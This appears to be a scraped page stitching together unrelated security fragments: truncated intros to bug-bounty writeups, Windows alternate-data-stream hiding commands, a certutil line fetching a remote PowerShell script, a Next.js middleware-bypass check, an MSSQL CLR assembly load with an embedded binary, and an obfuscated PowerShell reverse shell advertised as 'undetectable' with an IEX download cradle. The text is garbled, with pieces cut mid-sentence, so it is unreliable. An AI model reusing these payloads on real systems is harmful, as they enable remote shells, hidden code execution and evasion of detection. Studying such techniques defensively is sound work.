22sh sofianeelhor

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

hi, i'm daniel. i'm a 15-year-old with some programming experience and i do a little bug hunting in my free time. here's the insane story of how I found a single bug that affected over half of all Fortune 500 companies:

say hello to zendesk

If you've spent some time online, you’ve probably come across Zendesk.

Zendesk is a customer service tool used by some of the world’s top companies. It’s easy to set up: you link it to your company’s support email (like [email protected]), and Zendesk starts managing incoming emails and creating tickets. You can handle these tickets yourself or have a support team do it for you. Zendesk is a billion-dollar company, trusted by big names like Cloudflare.

Personally, I’ve always found it surprising that these massive companies, worth billions, rely on third-party tools like Zendesk instead of building their own in-house ticketing systems.

your weakest link

Scrambled vs NetExec

Let pwn the box Scrambled from HackTheBox using only NetExec ! For context, I was reading Scrambled writeup from 0xdf_ when I read this:

smbclient won’t work, and I wasn’t able to get crackmapexec to work either.

To be fair, at the time of his writeup it was true, but not anymore and it's pretty simple with NXC, 5 minutes and you get root :)

Note: I will pass the web part where we get one username : ksimpson

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

	metadata:
	language: v2-beta
	name: "CVE-2025-29927 - Next.js middleware bypass"
	description: "Checks for differences in responses when using different x-middleware-subrequest header paths"
	author: "Chris Grieger - blueredix.com"
	tags: "next.js", "middleware"

	run for each:
	middleware_value = "pages/_middleware",
	"middleware",

	import random
	import argparse
	import tempfile
	import ipaddress
	from time import sleep
	from shlex import split
	from os import path, remove
	from scapy.all import sniff
	from threading import Thread
	from subprocess import Popen, PIPE

	USE MSDB;
	exec sp_configure 'show advanced options',1;
	RECONFIGURE;
	EXEC sp_configure 'clr strict security', 0;
	RECONFIGURE;
	exec sp_configure 'clr enabled', 1;
	RECONFIGURE;
	CREATE ASSEMBLY my_assembly FROM 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a24000000000000005045000064860200afc554b30000000000000000f00022200b02300000d400000004000000000000000000000020000000000080010000000020000000020000040000000000000004000000000000000020010000020000000000000300408500004000000000000040000000000000000010000000000000200000000000000000000010000000000000000000000000000000000000000000010078030000000000000000000000000000000000000000000000000000fcf10000380000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000004800000000000000000000002e746578740000009dd20000002000

	#based on original script by @nikhil_mitt. Change ip and port
	#Undetectable on 05/09/2022
	# Example IEX(New-Object Net.WebClient).downloadString('http://<ip>/<file>.ps1')

	$KLK = New-Object System.Net.Sockets.TCPClient('<ip>','<port>');
	$PLP = $KLK.GetStream();
	[byte[]]$VVCCA = 0..((2-shl(3*5))-1)\|%{0};
	$VVCCA = ([text.encoding]::UTF8).GetBytes("Succesfuly connected .`n`n")
	$PLP.Write($VVCCA,0,$VVCCA.Length)
	$VVCCA = ([text.encoding]::UTF8).GetBytes((Get-Location).Path + ' > ')

	#!/usr/bin/env ruby

	# elisp, lua, python2, and jvm
	# https://docs.google.com/spreadsheets/d/1l1N_wtK8xA7N-ezG5iUjDeg6iKQgVaYf8ckTSp30QIo/

	$flag = File.read('flag').chomp

	$ml_preamble = nil
	$lua_preamble = nil
	$ruby_preamble = nil